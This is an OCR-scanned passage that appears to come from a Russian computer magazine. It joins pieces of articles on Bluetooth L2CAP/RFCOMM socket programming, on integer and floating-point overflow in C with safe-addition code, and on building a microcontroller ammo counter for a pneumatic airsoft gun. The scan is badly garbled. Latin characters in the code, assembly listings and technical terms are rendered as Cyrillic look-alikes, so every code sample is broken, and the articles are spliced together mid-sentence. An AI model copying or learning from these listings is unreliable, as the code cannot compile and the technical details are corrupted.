зсір_1ізВ_В *ргоВо_1ізВ = з<ір_1ізВ_аррепс1 (ШЬЬ , 12сар) ; 
ргоВо_1ізВ = зс!р_1ізВ_аррепс1 (ргоВо_1ізВ , гВсотт) ; 
ргоВо_1ізВ = зс!р_1ізВ_аррепсІ (ргоВо_1ізВ , оЬех) ; 



Все, регистрация завершена, и внешние клиенты должны видеть на нашем 
сервере сервис О ВЕХ О ВЗ ЕСТ РІ35Н, слушающий на девятом ВЕСОМ М- 
канале. 
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г І.2САР- И РРСОММ-СОКЕТЫ 

После длительных мучений с НСІ и ЗйР мы, наконец, получаем возмож- 
ность работать с простым, всем хорошо известным унифицированным 
интерфейсом ШЧІХ-сокетов. ВІиеіооіЬ-сокеты поддерживают І_2САР- и 
РРСОММ-адресацию. І_2САР-адреса специфицируются номерами Р5М 
(Ргоіосоіапсі Зегѵісе Миіііріехог), РРСОММ — номерами каналов. 

Воттак реализуется 12САР-сервер: 

іпЕ з=зоскеЕ (АР_ВШЕТООТН , ЗОСК_8Е0РАСКЕТ , 

ВТРЕОТО_Ь2 САР ) ; 

зЕгисЕ зоскасісіг_12 1ос_ас1сіг= { 0 } ; 

І0С_а<5сІг . 12_Еаті1у=АЕ_ВШЕТООТН; 

1ос_аскіг . 12_Ъс1асМг= *ВБАВВК_А№ Г ; 

1ос_аскіг . 12_рзт=]тЕоЪз ( 0x1001 ) ; 

Ъіпсі(з, (зЕгисЕ зоскаскіг * ) &1ос_аскіг , 
зігеоЕ (1ос_ас1сіг) ) ; 

ІізЕеп (з , 1) ; 

зЕгисЕ зоскасіс1г_12 гет_а<ісіг = {0}; 
зоск1еп_Е орЕ=зІ 2 еоЕ (гет_аскіг) ; 
іпЕ с1іепЕ=ассерЕ ( з , 

(зЕгисЕ зоскасісіг * ) &гет_аскіг , &орЕ) ; 
скаг ЪиЕ [1024] ={0} ; 

Ъа2зЕг (&гет_ас1сіг . 12_Ьсіасісіг , ЪиЕ) ; 
ргіпЕЕ ( "СоппесЕіоп Егот сІіепЕ %з\п" , ЪиЕ) ; 
гесѵ(с1іепЕ, ЪиЕ, зігеоЕ (ЪиЕ), МЗС_ЫОЗІСЫАЬ) ; 
зепсі (сІіепЕ , ЪиЕ, 5І2еоЕ(ЪиЕ), МЗС_ШЗІСЫАЬ) ; 

А воттак І_2САР-клиент: 

ІпЕ з = ЗОСкеЕ (АЕ_ВЫІЕТООТН , 

8ОСК_8Е0РАСКЕТ , ВТРКОТО_Ь2САР) ; 
зЕгисЕ зоскасісіг_12 аскіг={0}; 
асісіг . 12_Еаті1у = АР_ВШЕТООТН ; 
асісіг . 12_рзт = ЪЕоЪз ( 0x1001 ) ; 

зЕг2Ъа ("11:22:33:44:55:66", &асісіг . 12_Ьсіасісіг ) ; 
соппесЕ(з, (зЕгисЕ зоскасісіг *)&ас!сіг, зігеоЕ ( асісіг) ) ; 
сЪаг ЪиЕ [1024] = {0} ; 

зепсі(з, ЪиЕ, зІ 2 еоЕ(ЪиЕ), МЗС_ШЗІСЫАЬ) ; 
гесѵ(з, ЪиЕ, зігеоЕ(ЪиЕ), МЗС_ШЗІСЫАЬ) ; 

Несмотря на большое сходство с ТСР/ІР, здесьхочется заострить внимание 
на нескольких моментах. Во-первых, унификация порядка следования 
байтв Ыиеіооіб своя, и функции преобразования тоже свои. Какможно 
увидеть, вместо Ыопз (Ьозііо пеіѵѵогк збогі) здесь применяется ЫоЬз (Ьозі 
Іо ЫиеІооіЬ зЬогВ] и далее по аналогии. Во-вторых, при работе с І_2САР 



нужно всегда учитывать МТІІ (Махітит Тгапзтіззіоп ІІпіі) и оперировать 
пакетами, равными или меньшими по размеру этому самому МТІІ. Получить 
МТІІ с сокета можно воттак: 

зЕгисЕ 12сар_орЕіопз орЕз; 
іпЕ орЕІеп = зігеоЕ (орЕз) ; 
деЕзоскорЕ (зоск, 80Е_Ь2САР, 

Е2САР_ОРТІ(ЖЗ, &орЕз, &орЕ1еп); 
ргіпЕЕ ( " ІприЕ МТ11=%<5. ОиЕриЕ МТЕГ=%сі\п" , орЕз.ітЕи, 
орЕз . ошЕи) ; 

Аустановить — воттак: 

орЕз.отЕи = орЕз.ітЕи = ту_шЕи; 
зеЕзоскорЕ (зоск, ЗОЬ_Ь2САР, 

Ь2САР_ОРТІ(ЖЗ, &орЕз, орЕІеп) ; 

Фактически работа с РРСОММ-сокетами ничем не отличается от работы с 
62САР, за исключением нескольких моментов. Сокеты РРСОММ использу- 
ют как поточные, а не пакетные: 

іпЕ 3=ЗОСкеЕ (АЕ_ВЫІЕТООТН, 

ЗОСК_ЗТКЕАМ, ВТРКОТО_КЕСОММ) ; 

Для адресации здесь применяются другие структуры с другими полями: 

зЕгисЕ зоскасісіг_гс асісіг={0}; 
асісіг . гс_Еаші Іу =АЕ_ВЬиЕТООТН ; 
асісіг . гс_с1іаппе1= (иіпЕ8_Е ) 1; 

зЕг2Ьа ("11:22:33:44:55:66", &асі<іг . гс_Ьсіасісіг ) ; 

При приеме данных с РРСОММ -сокетов фрагментация — обычное дело. Ты 
попросил датьтебе 100 байт, вместо этого тебе дали 30 байт, потом 50 байт 
и потом еще 20 байт. Втакой ситуации можно попросить вызов гесѵ деф- 
рагментировать потоке помощью флага М56_ѴѴАІТАІ_І_либо незабывать 
самостоятельно отслеживать длину принятых данных и собирать нужные 
куски вручную. 

г ИТОГ 

Теперь мы имеем на руках весь необходимый инструментарий, чтобы 
написать свои собственные клиент и сервер О ВЕХ ОВІЕСТ РІІ5Н. Осталась 
только реализация протокола, ксчастью, он нетаксложен. Выше была 
приведенатаблица, иллюстрирующая обмен данными между клиентом, 
отправляющим файл, и сервером, этот файл принимающим. Реализацию 
клиента и сервера ты найдешь на диске, прилагающемся к журналу. ~іг 
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О ПЕРЕПОЛНЯЮЩИХСЯ БУФЕРАХ НАПИ- 
САНО МНОГО, О ПЕРЕПОЛНЕНИИ ЦЕЛО- 
ЧИСЛЕННЫХ/ВЕЩЕСТВЕННЫХ ПЕРЕМЕН- 
НЫХ - ЧУТЬ МЕНЬШЕ, А ВЕДЬ ЭТО ОДНА 
ИЗ ФУНДАМЕНТАЛЬНЫХ ПРОБЛЕМ ЯЗЫ- 
КА СИ, ДОСТАВЛЯЮЩАЯ ПРОГРАММИС- 
ТАМ МАССУ НЕПРИЯТНОСТЕЙ И ПОРОЖ- 
ДАЮЩАЯ ЦЕЛЫХ В0Р0ХУЯЗВИМ0СТЕЙ 
РАЗНОЙ СТЕПЕНИ ТЯЖЕСТИ, ОСОБЕННО 
ЕСЛИ ПРОГРАММА ПИШЕТСЯ СРАЗУ ДЛЯ 
НЕСКОЛЬКИХ ПЛАТФОРМ. КАК БЫТЬ, ЧТО 
ДЕЛАТЬ? МЫЩЪХ ДЕЛИТСЯ СВОИМ ЛИЧ- 
НЫМ БОЕВЫМ ОПЫТОМ (С УЧЕТОМ ВСЕХ 
ТРАВМ И РАНЕНИЙ, ПОЛУЧЕННЫХ В ХОДЕ 
СРАЖЕНИЙ), НАДЕЯСЬ, ЧТО ЧИТАТЕЛИ 
НАЙДУТЕГО ПОЛЕЗНЫМ, АОНТЕМ ВРЕ- 
МЕНЕМ В ГОСПИТАЛЕ С СЕСТРИЧКОЙ... 

Л А ракон суров, но он закон 

I Фундаментальность проблемы переполнения целочисленных 
переменных имеет двойственную природу. Стандарт декларирует, что 
результат выражения (а+Ь) в общем случае неопределен (ипсіеЛпесІ) и за- 
висит как от архитектурных особенностей процессора, так и от характера 
компилятора. Положение усугубляется тем, что Си (в отличие от Паскаля, 
например) вообще ничего не говорило разрядности типов данных, боль- 
ших, чем байт. Іопд іпі вполне может равняться іпі. И хотя начиная с АЫ5І 
С99 появилисьтипы іпі32_Ц іпі64_Ц а некоторые компиляторы (в частнос- 
ти, М 5 ѴС) еще черт знает с какой версии поддерживают нестандартные 
типы_іпі32 и_іп164, проблема определения разрядности переменных 
остается. Одним процессорам выгоднее обрабатывать 64-битные дан- 
ные, другим — 32-битные, и потому выбирать тип «на вырост», то есть с 
расчетом, чтобы в него точно влезли обозначенные значения, — расточи- 
тельно и негуманно. 

К тому же гарантии, что переполнение не произойдет, унаснет. Обычно 
при переполнении наблюдается либо изменение знака числа (небольшое 
знаковое отрицательное превращается в большое беззнаковое), либо 



заворотпо модулю, физическим аналогом которого могут служить обыч- 
ные механические часы. Хи нт: 3+1 1=2, а вовсе не 14! Вот та к неожидан- 
ность! И ищи потом, на каком этапе вычислений данные превращаются в 
винегрет! А искать можно долго, и ошибки возникают даже в полностью 
отлаженных программах, стоиттолько скормить им непредвиденную 
последовательность входных данных. 

ЦІА-1 (смотри приложение «Н» к Стандарту АЫ5І С99) говорит, что в 
случае отсутствия заворота при переполнении знаковых целочислен- 
ных переменных компилятор должен генерировать сигнал (ну или, в 
терминах М іеговой, выбрасывать исключение). Поскольку знаковый 
бит на х86- процессорах расположен по старшему адресу, заворота не 
происходит, и некоторые компиляторы учитываютэто обстоятельство 
при генерации кода. В частности, ѲСС поддерживает специальный флаг 
'-Йгарѵ'. Посмотрим, какой работает? 

ИСХОДНАЯ ФУНКЦИЯ, СКЛАДЫВАЮЩАЯ 
ДВА ЗНАКОВЫХ ЧИСЛА ТИПА ШТ 

іоо ( іпГ а , іпГ Ь) 

{ 

геЬигп а+Ь; 

} 

КОМПИЛЯЦИЯ КОМПИЛЯТОРОМ есс С КЛЮЧАМИ поумолчанию 

іоо ргос пеаг 

ризЬ еЬр ; открываем кадр стека 

тоѵ еЬр, езр 

шоѵ еах, [еЬр+агд_4] ; грузим аргумент Ь в ЕАХ 

аЬЬ еах, [еЬр+агд_0] ; ЕАХ := (а + Ь) 

рор еЬр ; закрываем кадр стека 

геЕп ; возвращаем сумму (а+Ь) в ЕАХ 

іоо епЬр 

Очевидно, что результат работы этой функции непредсказуем, и, если сумма 
двух іпФов не влезет в отведенную разрядность, нам вернется чертзнает 
что. А воттеперь используем флаг '-Цгарѵ': 

КОМПИЛЯЦИЯ КОМПИЛЯТОРОМ есс С КЛЮЧОМ '-РТРАРѴ' 

іоо ргос пеаг 

ризЬ еЬр ; открываем кадр стека 

шоѵ еЬр, езр 
зиЬ езр, 18Ь 

шоѵ еах, [еЬр+агд_4] ; грузим аргумент Ь в ЕАХ 

; передаем аргумент Ь функции аскіѵзіЗ 

шоѵ [езр+18Ь+ѵаг_14 ] , еах 

шоѵ еах, [еЬр+агд_0] ; грузим аргумент а в ЕАХ 

; передаем аргумент а функции аскіѵзіЗ 

шоѵ [езр+18Ь+ѵаг_18 ] , еах 

саіі аскіѵзіЗ ; безопасное сложение 

Іеаѵе ; закрываем кадр стека 

гебп ; возвращаем сумму (а+Ь) в ЕАХ 

іоо епЬр 



аскіѵзіЗ ргос пеаг 

ризЬ еЬр ; открываем кадр стека 

шоѵ еЬр, езр 
зиЬ езр, 8 

; сохраняем ЕВХ в локальной переменной 
шоѵ [еЬр+ѵаг_4] , еЬх 

шоѵ еах, [еЬр+агд_4] ; грузим аргумент Ь в ЕАХ 




II 





саіі іб8б_де1і_рс_'Ыіипк_Ьх ; грузим кЬшік в ЕВХ 

асИ еЬх, 122ЕЙ ; -> СЬОВ АЬ_ОР Р 3 ЕТ_Т АВЬЕ 

шоѵ есх, [еЬр+агд_0] ; грузим аргумент а в ЕСХ 

СезС еах, еах ; определяем знак аргумента Ь 
Іеа ебх, [еах+есх] ; ЕБХ : = а + Ь 

33 зкогк 1ос_8048410 

стр ебх, есх ; ІЁ ( (а + Ь) >= а) 

зде зйогб 1ос_8048400 ; добо ОК 

1ос_80483Е5: ; если ((а+Ь)<а)... 

саіі _аЬогВ ; то имело место переполнение 

Іеаезі, [езі + 0] ; и мы абортаемся 



1ос_8048400 : 



; нормальное продолжение программы 



шоѵ еЪх, [еЬр+ѵаг_4] 

шоѵ еах, есіх 

шоѵ езр, еЬр 

рор еЬр 

геВп 

1ос_8048410 : 

стр есіх, есх 
зд зкогВ 1ос_80483Е5 



восстанавливаем ЕВХ 
перегоняем в ЕАХ (а+Ь) 
закрываем 
кадр стека 

возвращаем (а+Ь) в ЕАХ 

работаем со знаковыми 
ІВ ( (а+Ь) < а) 

СОТО _аЬогЕ 



зтр зЬогВ 1ос_8048400 ; -> нормальное продолжение 
асЫѵзіЗ епбр 

Сложение с флагом '-Ьгарѵ' безопасно, но... какже онотормозит! Кстати, на 
уровне оптимизации '-02' и выше флаг '-Игару' игнорируется. Но даже без 
всякой оптимизации он не ловит переполнения приумножении и, что самое 
печальное, поддерживается не всеми компиляторами. 

Л впишем закон сами! 

4м На самом деле для «безопасного» сложения чисел у нас есть все 
необходимые ингредиенты. Причем оно будет работать с любым компиля- 
тором на любомуровне оптимизации и сдостаточно приличной скоростью 

(уж во всяком случае побыстрее, чем асИѵвіЗ в реализации отѲСС). 

Функция безопасного сложения двух переменныхтипа і пі в простейшем 
случае выглядиттак: 



определяется типом и архитектурой процессора). Главное, что х86 и неко- 
торыедругие ЦП поддерживают генерацию исключений при переполнении 
вещественных переменных. Но умолчанию она выключена, и включить ее, 
увы, средствами чистого Си нельзя, но вотесли прибегнуть кфункциям АРІ 
или нестандартным расширениям... 

Рассмотрим следующую программу: 

АКТИВАЦИЯ ИСКЛЮЧЕНИЙ ПРИ РАБОТЕ С ВЕЩЕСТВЕННЫМИ 
ПЕРЕМЕННЫМИ 

#іпс1исіе <Г1оаб.Ь> 

#іпс1ис1е <збЫо.Ь> 



таіп ( ) 

{ 



// объявляем вещественную переменную 
// (это может быть также и Поаб) 

ІоиЫе Г = 666; 

// считываем значение управляющего слова 
// сопроцессора через МЗ-зресібіс функцию 
іпб см = _сопбго1Гр ( 0 , 0) ; 

/ / задействуем исключения для следующих ситуаций 
см &=~ ( ЕМ_0ѴЕКЕІШ I ЕМ_ШГОЕКЕЬ(Ж I 

ЕМ_ШЕХАСТ | ЕМ_2ЕЕОБІѴІБЕ | ЕМ_ОЕШЕМАЬ ) ; 

/ / обновляем содержимое управляющего 
// слова сопроцессора 
_сопРго1бр( см, МСШ_ЕМ ) ; 

//в блоке бгу мы будем делать исключения 
бгу { 

//в бесконечном цикле вычисляем Г = 
мЫІе (1) 

{ 

// выводя его содержимое на экран 
ргіпбб ( " %Г\п" , Г = Г * I ) ; 

} 

} 



Р ■* 




ФУНКЦИЯ БЕЗОПАСНОГО СЛОЖЕНИЯ 

#іпс1ис1е <1ітібз.Ь> /* здесь содержатся лимиты 
всех типов */ 

іпб забе_аЬЬ (іпб а, іпб Ь) 

{ 

іб (ІЬТ_МАХ - Ь < а) 

_аЬогб (ЕКЕОЕ_СОБЕ) ; 

гебигп а + Ь; 

} 

Дизассемблерный листинг не приводится за ненадобностью. Если 
компилятор заинлайнит заі : е_абб, то мы имеем следующий оверхид: одно 
лишнее ветвление, одно лишнее с равнение и одно лишнее вычитание. 
Конечно, в особо критичных фрагментах (да еще и в глубоко вложенных 
циклах) этотоверхид непременно даст о себезнать, и втаком случае луч- 
ше отказаться отзаі : е_абб и пойти другим путем. Например, обосновать, 
что переполнения (в данном месте) не может произойти в принципе даже 
при обычном сложении. 

Л Л отправляемся в плаванье 

Вещественные переменные, в отличие от целочисленных, рабо- 
тают чуть медленнее, хотя... это еще как сказать! С учетом того, что АШ- и 
РРІІ-блоки современных ЦП работают параллельно, для достижения 
наивысшей производительности целочисленные и вещественные 
переменные должны использоваться совместно (конкретная пропорция 
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} 



ехсерб (рибз ( " іп Гіібег " ) , 1) 

//а тут мы ловим возникающие исключения! 

{ 

рибз ( " іп ехсерб " ) ; 

// для упрощения обработка исключений опущена 

} 




В зависимости от компилятора (и процессора) этот пример будеттормо- 
зить в большей или меньшей степени. В частности, на х86 вещественное 
деление намного быстрее целочисленного. С другой стороны, компиля- 
тор М5 ѴС выполняет вещественное сложение в разы медленнее глав- 
ным образом потому, что не умеет сохранять промежуточный результат 
вычислений в регистрах сопроцессора и постоянно загружает/выгружает 
их в переменные, находящиеся в памяти. 6СС такой ерундой не страдает, 
и при переходе с целочисленных переменных на вещественные быстро- 
действие не только не падает, но местами даже и возрастает. 

Кроме того, вещественные переменные имеют замечательное значение 
«не число», которое очень удобно использовать в качестве индикатора 
ошибки. У целочисленных с этим настоящая проблема. Одни функции 
возвращают 0, другие — 1 , в результате чего возникает путаница, а если 
и 0, и -1 входят в диапазон допустимых значений, возвращаемых функ- 
цией, приходится не по-детски извращаться, возвращая код ошибки в 
аргументе, переданном поуказателю или же через исключения. 

Ас вещественными переменными все просто и удобно. И это удобство стоит 
небольшой платы производительностью. □□ 

> 121 , 
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КАЖДЫЙ 
ВЫСТРЕЛ 
НА СЧЕТУ 






Цифровой счетчик патронов 



своими руками 



1 




Ты наверняка много раз видел фильмы про будущее, в которых бравые космические 
десантники мочили страшных инопланетных паразитов. Их интеллектуальное вооруже- 
ние, разработанное в недрах межгалактических корпораций, невольно вызывало уваже- 
ние и заставляло задуматься о примитивности оружия наших дней. Конечно, некоторые 
наработки в этой области имеются, но в основном сделанные нашими стратегическими 
соперниками (читай просто: врагами), что категорически не идет нам на пользу. Това- 
рищ, пора уже взять ситуацию в свои руки! В твоих силах самостоятельно изготовить эф- 
фектный микропроцессорный апгрейд для своего любимого ствола! Начнем, пожалуй, с 
визуализации количества оставшихся в обойме патронов. 



В ЖЕРТВА 

В принципе, для модернизации подойдетлюбая 
пушка, обладающая электронным спуском, в кор- 
пус которой можно будетуместить печатную плату 
девайса и индикатор. Это, например, страйк- 
больные стволы, некоторые модели пейнтболь- 
ных и С0 2 -п истолетов/пулеметов/винтовок. Если 
же выбор пал на пушку, обладающую традицион- 
ным (сугубо механическим) ударно-спусковым 
механизмом, то тебе останется только придумать 
способ захвата события «выстрел произошел». 
Например, установить оптопару, чтобы при вы- 
стреле курок перекрывал луч, или задействовать 
геркон. Вся остальная логика схемы сохранится. 

У меняуже давно валяется и скучает пневма- 
тический пистолет-пулемет «Дрозд», который 
просто создан для модификаций. Какты уже 
догадался, именно его я и буду препарировать. 



г НУТРО 

Родная плата «Дрозда» довольно примитивна. Ее 
сердце — безликая микросхема с минимальной 
обвязкой, напоминающая собой таймер. Трех- 
позиционные переключатели меняюттемп (300, 
450, 600 выстрелов в минуту) и режим стрельбы (1 , 
3, 6 выстрелов за раз) — микруха будет генери- 
ровать различные пачки импульсов. Ты жмешь 
на спуск — порождается «логический» импульс, 
который поступает на ключ. Ключ этот выполнен 
на мощном полевом транзисторе и служит для 
коммутации большого тока на соленоид. Ты, 
наверное, еще со школы знаешь, что если по ка- 
тушке пропустить ток, она втянетсердечник. Тут 
этотэффект используется для открытия клапана: 
сердечникбьет по нему, и высвободившийся газ 
разгоняетснаряд. Большой электролитический 
конденсатор установлен туда неслучайно. Он 



призван обеспечить быструю отдачу достаточно- 
го количества энергии на соленоид, так какакку- 
муляторы сами по себе не могут дать желаемый 
ток. Это сравнимо со вспышкой в фотоаппарате. 
Емкий конденсатор сравнительно медленно 
накапливает энергию, а в момент съемки резко 
отдает ее лампе. Импульсы, названные мной «ло- 
гическими», мы и будем считать. Как видишь, все 
очень просто. На картинке я обозначил дорожку, 
которая ведет кзатвору полевого ключа. Это как 
раз то место, в которое мы врежем наш счетчик. С 
ІЫ будем снимать импульсы, при необходимости 
обрабатывать и пропускать дальше в О ЦТ на за- 
твор. Питание возьмем с ножектолстого конден- 
сатора: там, где у него широкая серая полоска, 

— земля; другой вывод, соответственно, — плюс. 
Смотри не перепутай! Если сомневаешься, на 
обратной стороне платы выводы подписаны :). 
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Изготовление 
рсЬ с помощью 
фоторезиста 

Эта технология позволяет получать более качественные и сложные 
платы, нежели ЛУТ. Фоторезистом называют светочувствительный лак, 
который меняет свои свойства при облучении ультрафиолетом. У нас в 
продаже чаще всего встречается Розігіѵе 20. На очищенный текстолит 
в центрифуге напыляют равномерный слой лака (следует избегать 
попадания света и бытовой пыли) . Сушат 15 минут при 70 градусах. 
Затем через пленку-фотошаблон, на которой черным цветом напечатан 
рисунок проводников, засвечивают заготовку ультрафиолетом (340- 
420 нм — 1-10 сек) . После этого плату примерно на минуту помещают 
в слабый раствор ИаОИ. С тех мест, на которые попал УФ, лак смоется и 
позволит стравить медь. Промыв, плату травят в РеСІ^. Перед лужением 
лак на дорожках растворяют ацетоном. 



Используемые 

детали 

• АТйпу26 зоіс20 х 1 шт. 

• ПА04-11НѴѴАх 1 шт. 

• 78М05 факх 1 шт. 

• ВС817 5011-23 х 2 шт. 

• ІК13502х1 шт. 

• танталовый конденсатор 16 мкф х 16 В, тип — В х 1 шт. 

• керамический конденсатор, 100 нф, типоразмер 0805 х 2 шт. 

• 100 Ом, типоразмер 0805 х 7 шт. 

• 2,2 кОм, типоразмер 0805 х 5 шт. 

• 1,6 кОм, типоразмер 0805 х 1 шт. 

• маленькая кнопка на замыкание 

• шлейф с шагом 1,27 мм 

• пара метров монтажного провода МФГ 



Н СХЕМА 

Чтобы тебе было понятнее, я набросал схемку в 
САПРе (САПР — Система автоматизации проект- 
ных работ. — Прим. сШпу]. Вообще, советую не 
обделять вниманием подобные программы — без 
них ни один мало-мальски мудреный прибор не 
сделаешь (когда будем получать рисунок печат- 
ной платы, ты поймешь почему). 

Схема тривиальна из-за применения микроконт- 
роллера. На рассыпухе она была бы куда сложнее 
и бестолковее :). Крометого, мы имеем приятные 



дополнительные возможности вроде сохране- 
ния остатка боезапаса в ЕЕРР0М, проведения 
какой-нибудьхитрой обработки и т.д. 78М05 
— это линейный регулятор напряжения, который 
поддерживает на выходе 5 В при входном напря- 
жении, большем 5 В. Это как раз то, что нужно для 
питания нашей микрухи. Конденсаторы С 1 , С2, 

СЗ сглаживают возможные пульсации. Линия 
РВ4 отвечает за захват входного импульса, а 
резисторы П1 , П2 составляют делитель напряже- 
ния для снижения его размаха с 9-1 2 В до 3,5-5, 0 



В, на которые с удовольствием среагирует наш 
контроллер. Мы же не хотим ничего спалить?! 
Линия РВ5, в свою очередь, отвечаетза посылку 
импульса на затвор ключа. 

На ножку РВ6 я повесил кнопку. Она будет выпол- 
нять несколько важных функций. Во-первых, это 
восстановление счетчика после перезарядки и 
сохранениетекущегозначения, а во-вторых, вход 
в режим установки емкости (для совместимости с 
разными обоймами: от 0 до 99 патронов). Единс- 
твенная хитрость состоит в подключении инди- 
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> сіѵсі 

На дискеты найдешь 
исходник програм- 
мы, прошивку в виде 
Ьех-файла, софт 
для программатора 
РопуРгод, докумен- 
тацию на контроллер 
и изображение 
печатной платы, по 
которомуты суме- 
ешь повторить ее 
методом ЛУТ или 
фоторезиста. 



катора. Как можно догадаться по картинке, каждый цифровой 
разряд состоит из семи сегментов. Производители индикаторов 
договорились обозначать сегменты буквами, с верхнего и 
далее по часовой стрелке: а, Ь, с, б, е, і Сегментд — средний 
горизонтальный. Каждый сегмент, по сути, обычный светодиод. 
В индикаторе ОА-О4эти светодиоды внутри соединены анодами 
и общий контакт выведен наружу. Чтобы рационально исполь- 
зовать пространство, мы не будем тупо лепить каждый диод к 
линии порта, раздувая шлейф на Ібжил, а используем строби- 
рование. Это позволит сократить количество проводников до 
девяти. Соединим сегменты обоих разрядов параллельно, то 
естьа1-а2, Ы-Ь2, ит.д. Будем последовательно зажигать каж- 
дый разряд путем коммутациитолько одногоанода, и делатьэто 
мы будем очень быстро, чтобы никто не заметил легкого обмана. 
Сетчатка человеческого глаза довольно инертна и поэтому 
никакой разницы наблюдатель не обнаружит. Соединяем пары 
а 1 -а2, Ы -Ь2, с1-с2, 61-62, еі -е2, И -62, ді -д2 с линиями порта 
А контроллера через токоограничивающие резисторы. Аноды 
индикатора присоединяем клиниям РВО, РВ1 через ключи на 
би полярных транзисторах. 

Н РАЗВОДКА 

Разъемы для подключения шлейфа и прочего я решил не ста- 
вить и паять напрямую — в первую очередь из-за отсутствия в 
продаже нормальных соединителей с шагом 1,27 мм, а также 
из-за банальной экономии места. Даже самый миниатюрный 
разъем занял бы треть площади платы. На фигтакой расклад. 
Девайсикуместился на односторонней плате с двумя пере- 
мычками, габариты которой менее 25x40 мм. Места в «Дрозде» 
хватаетсзапасом. На картинке наглядно проиллюстрирован 
процесс разводки. 

В ИЗГОТОВЛЕНИЕ 

В этот раз при изготовлении печатки я заморочился по полной 
программе. Применил фоторезист, шаблоны, УФ-лампу, ЫаОЬ и 
РеСІ^ (рекомендую посмотреть этот метод в интернете — очень 
полезная штука). Мои старания не прошли даром, и я получил 
рисунок проводников высокого качества! Ты можешь сделать 
печатную платулюбым способом, который осилишь. Оптималь- 
ным, пожалуй, будет метод лазерного утюга. Картинку с раз- 
водкой платы в высоком разрешении ищи на диске. Размеры 
платы для самостоятельного изготовления: 38 на 21 ,5 мм. Когда 
протравишь, не забудь залудить дорожки и контактные пло- 
щадки (каку меня). Будет проще паять крохотные детали. Более 
того, твое устройство будет выглядеть гораздо приличнее. 

В первую очередь капитально впаяй 78М05. Земляной 



вывод этой детали является еще и радиатором, поэтому по- 
ложи туда побольше припоя, чтобы тепло лучше рассеива- 
лось. И еще — не вздумай припаять регулятор напряжения 
легкоплавким припоем! Даже при входном напряжении, 
находящемся в рамках допустимых значений, он может 
очень сильно греться и банально отпаяться. Затем установи 
С 1 , С2, СЗ. Желтая бобышка С1 — этотанталовый конденса- 
тор. Он полярен (при его впайке имеетзначение, где минус, 
а где плюс), положительная ножка у него там, где полоска. 

С2 и СЗ впаивай любой стороной, они керамические. С по- 
мощью тестера проверь полярность и номинал напряжения 
на площадках под микроконтроллер: на пятой площадке от- 
носительно шестой, должно быть примерно 5 В. Может быть 
чуть больше, поскольку в нашей схеме пока ничто ничего не 
потребляет (это называется «режимо холостого хода»). Но 
если тестер показывает напряжение больше 5,5 В, а то и все 
9 В, то тут что-то неладно. Если норма, смело впаивай все 
остальное. В самую последнюю очередь сделай две про- 
водные перемычки оттранзисторов. И не забудь приделать 
кнопочку, ее лучше будет вывести на левую сторону корпуса 
«Дрозда». 

Теперьзаймемся индикатором и шлейфом. Я специально 
развел плату так, чтобы максимально упростить этот момент. 
Распайка очевидна из картинок. У индикатора проводками со- 
едини одноименные сегменты. Для механической устойчивос- 
ти можешь залить это место эпоксидной смолой (естественно, 
после проверки правильности соединения, иначе можетбыть 
очень обидно). 

После сборки смой флюс/канифольс платы. Сделать это 
можно спиртом или бензином. Еслиты использовал какой- 
то особенный флюс, прочитай на упаковке: возможно, он 
смывается обычной водой. Проделать эту операцию лучше 
после того, как зальешь прошивку, проверишь и отпаяешь 
программатор. Флюс надо смыть обязательно, а то некоторые 
виды флюсов со временем становятся токопроводящими и 
устройство перестает работать. 

Сейчасзаймемся установкой счетчика внутрь корпуса «Дроз- 
да». Первым делом выпаяй большой транзистор ІПБ из родной 
схемы. Мы заменим его ІПІ_3502 — аналогичным, но срабаты- 
вающим отлогического уровня на затворе. По цоколевке они 
абсолютно идентичны, поэтому вопросов тут быть не может. 
Возьми резистор 2,2 кОм и припаяй между затвором (если 
смотреть спереди, затвор — это первая ножка!) и землей. 

Это позволит избежать непроизвольных выстрелов или по 
крайней мере странных шептунов во время инициализации 
контроллера. В бета-версии этой схемы затвор кземле я не 
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Принципиальная схема счетчика 

подтягивал и катастрофы не произошло, но мы 
же делаем надежный девайс, не правда ли? 

Для военного, таксказать, применения! Затем 
присоедини питание илинииІЫ — «сигнал», 
ОІІТ — «на затвор». 

Н ПИСАНИНА И ШИТЬЕ 

Итак, самоетяжелое позади! Прикинем алго- 
ритм работы программы. 

• старт, инициализация портов 

• проверка, входим ли в режим 
установки 

• если да, то работаем в цикле 

• юзер выбирает значение емкости 

• рисуем цифры 

• закончили? выходим из цикла 

• бесконечный цикл основной работы 

• есть входящий импульс && 
патроны еще есть? 

• да — пропустить и декрементиро- 
вать патроны 

• нет — блокировать импульс 

• нарисовать цифры 

Программирование под контроллер, парень, 
— это не какое-то там формошлепство на 
бейсике! Тут все серьезно, хотя тоже не очень 
сложно :). Я расскажу об этом в двух словах. 
Написание программы наСинесильно 
отличается от программирования на «боль- 
шом» компьютере, но тут появляются такие 
факторы, как существенная ограниченность 
памяти ОЗУ и памяти программ. Значит надо 
делать все вдумчиво, экономно и красиво! 
Плюс кэтому, необходимо в реальном време- 
ни реагировать на происходящее, чтобы не 
получилосьтак, что какой-нибудь медицин- 
ский прибортипа кардиостимулятора, считая 
жесткий тангенс/секис, не успеет подать 
импульс на сердце пациента и капут. Путем 
чтения/записи чисел в определенные реги- 
стры программа может переконфигурировать 
кристалл, общаться с внешним миром через 
порты ввода-вывода, прерываться и прочее. 
Моя программа получилась немаленькой, 



поэтому приводить ее здесь целиком я не буду. 
Исходнике ппакебіе’ом и прошивкой ищи на 
диске. Атут мы рассмотрим только самое инте- 
ресное. Как реализовать поразрядный вывод 
на наш индикатор, если мы имеем, скажем, байт 
с целым числом патронов? Люди, воспитанные 
на бейсике, вероятно, предложат поделить на 1 0 
и взять остаток отделения. Но это ложный путь. 
Сколько тактов выполняется такая операция на 
ПІЗС-контроллере аѵг, в котором нету инструк- 
ций тосі и сііѵ? Если реализовать деление байта 
на байт на ассемблере вручную, то, в зависимос- 
ти отоптимизации по скорости или по размеру 
кода, мы получим от 58 до 97 тактов. Учитывая, 
что наш ііпу26 работает на 1 МГц, такая операция 
оказывается довольно дорогой: за время ее 
выполнения может произойти много интересно- 
го во внешнем мире. Поэтому родился гораздо 
болееэкономичный способе вычитанием: 

ѵоіб бізріау (иіпС8_Ц пишЬег) 

{ 

иіпб8_С бесз=0; 

// считаем десятки 
мііііе (пшпЪег>=10 ) 

{ 

пишЬег-=10 ; 
бесз++ | 

} 

// отключаем аноды индикатора 
сЬі ( РОКТВ , РОКТВО ) ; 
сЬі ( РОКТВ , РОКТВ 1 ) ; 

// переключаем разряды через 
цикл, чтобы достичь равномерной 
яркости 
іб (г==0 ) 

{ 

г = 1 ; / / в следующем цикле ри- 

